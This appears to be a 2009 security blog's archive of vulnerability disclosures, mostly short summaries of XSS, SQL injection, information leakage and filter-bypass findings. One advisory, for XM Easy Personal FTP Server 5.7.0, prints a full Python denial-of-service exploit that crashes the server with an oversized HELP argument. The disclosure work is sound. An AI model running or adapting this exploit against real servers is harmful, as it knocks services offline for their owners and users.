Disclosures

Bypassing URL filtering for flickr in Dubai

// August 14th, 2009 // 1 Comment » // Disclosures

The Great Wall of Dubai – Access to flickr hacked!!! :)

Author: Simran Gambhir

For detailed information click here to download pdf.

Information leakage in outlookindia.com website

// August 13th, 2009 // No Comments » // Disclosures

Outlook Money  – http://money.outlookindia.com/ Directory Listing Allowed and Open access to User’s Personal information including
Name,Address,E-mail,Phone No.,Mobile No. etc.

Author: Raxit Sheth

For detailed information click here to download pdf.

XM Easy Personal FTP Server Multiple DoS vulnerabilities

// July 30th, 2009 // No Comments » // Disclosures

Author: Neeraj Thakar

Link to the author’s post:

http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html

BID: http://www.securityfocus.com/bid/35239

Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10

Date of Discovery: 14-May-2009

Vendor: Dxmsoft
URL: http://www.dxm2008.com/

Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Multiple Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when a long list of arguments is sent to certain FTP commands post authentication.

Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands like HELP or TYPE. When a long value ( > 4700 Bytes) is passed as a parameter to these commands, the FTP server cannot process it and it will crash. Note that this is a post authentication vulnerability, so user must be logged in to exploit the vulnerability. No registers are overwritten, hence remote code execution may not be possible.

Severity:
High

Solution:
No patches available from vendor
No workaround is available at this time

Vendor Communication Timelines:
05.14.2009 – Vulnerability Discovered
05.15.2009 – Vendor Notified
05.20.2009 – No Response, Vendor Notified again
06.05.2009 – No Ack from Vendor, Public Disclosure

PoC: Python Exploit
—————————————————–
#!/usr/bin/python
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:….[ XM Easy Personal FTP Server 5.7.0 ]…..
# [-] Where:…[ http://www.dxm2008.com ]…………….
# [-] When:….[ 14-May-2009 ]………………………
# [-] Who:…..[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]….
# [-] How:…..[
# A Denial of service vulnerability exists in XM
# Personal FTP Server that causes the application to
# crash when a long list of arguments is sent to
# certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]…………

import os
import sys
import time
from ftplib import FTP

def usage():
print “[...XM Personal FTP Server 5.7.0 DoS Exploit...]”
print “[.........neeraj(.)thakar(at)gmail(.)com..............]\n”
print “Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n”
print “\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P \n”

# The Main function starts here..
if __name__ == “__main__”:
ftpport = ’21′

# get the args..
if len(sys.argv) < 3:
usage()
sys.exit(1)
ftpserver = sys.argv[1]
user = sys.argv[2]
passwd = sys.argv[3]

print “Connecting to “+ftpserver+” using “+user+”….”,

# Try opening a connection to the FTP server
try:
F = FTP(ftpserver)
F.timeout = 3
if F:
print ‘Connected !’
except:
print “\nCould not connect to the Server :( \n”
sys.exit(1)

#Lets create the Buffer..
crap = “A” * 5000

# Creat’in da’bomb
dabomb = ‘HELP ‘+crap

print “Press any key to login..”
ch = sys.stdin.read(1)

# Lets login
try:
F.login(user, passwd)
except:
print “Oops.. Looks like you forgot to create a login !!\n”
F.quit()
sys.exit(1)
print “Target Locked, Press any key to fire..”,
ch = sys.stdin.read(1)

print ‘Sendin Da\’Bomb..’
try:
F.sendcmd(dabomb)
except:
print ‘Target destroyed !! Mission successfull..!’

print ‘Returning to base..’
F.close()
sys.exit(0)
—————————————————–

ideacellular.com SQL Injection Vulnerability

// May 10th, 2009 // No Comments » // Disclosures

The corporate login option on Idea cellular website was vulnerable to SQL injection attack. It was reported to ideacellular staff on 17th March 2009 and fixed on 23rd March 2009. They had initially informed us that it will take them around 8 days to fix it, surprisingly they fixed it in 7 :-D , does it actually take that much time :-P .

For detailed information click here to download pdf.

Kosmix.com Cross site scripting vulnerability

// May 10th, 2009 // No Comments » // Disclosures

Kosmix.com search option is vulnerable to XSS. It was originally reported to the kosmix staff on 16th April 2009, but they have not replied back on this issue.

For detailed information click here to download pdf.

Rediff Cross site scripting vulnerability

// May 10th, 2009 // 1 Comment » // Disclosures

Rediff normal search and job search suffer from XSS vulnerability. It was reported to rediff on 14th April 2009, but there has been no response from rediff staff on this issue.

For detailed information click here to download pdf.

HDFC SPF Failure

// May 10th, 2009 // No Comments » // Disclosures

The email alerts from HDFC suffer from SPF Auth failure as HDFC’s TXT records are not configured properly.

For detailed information click here to download pdf.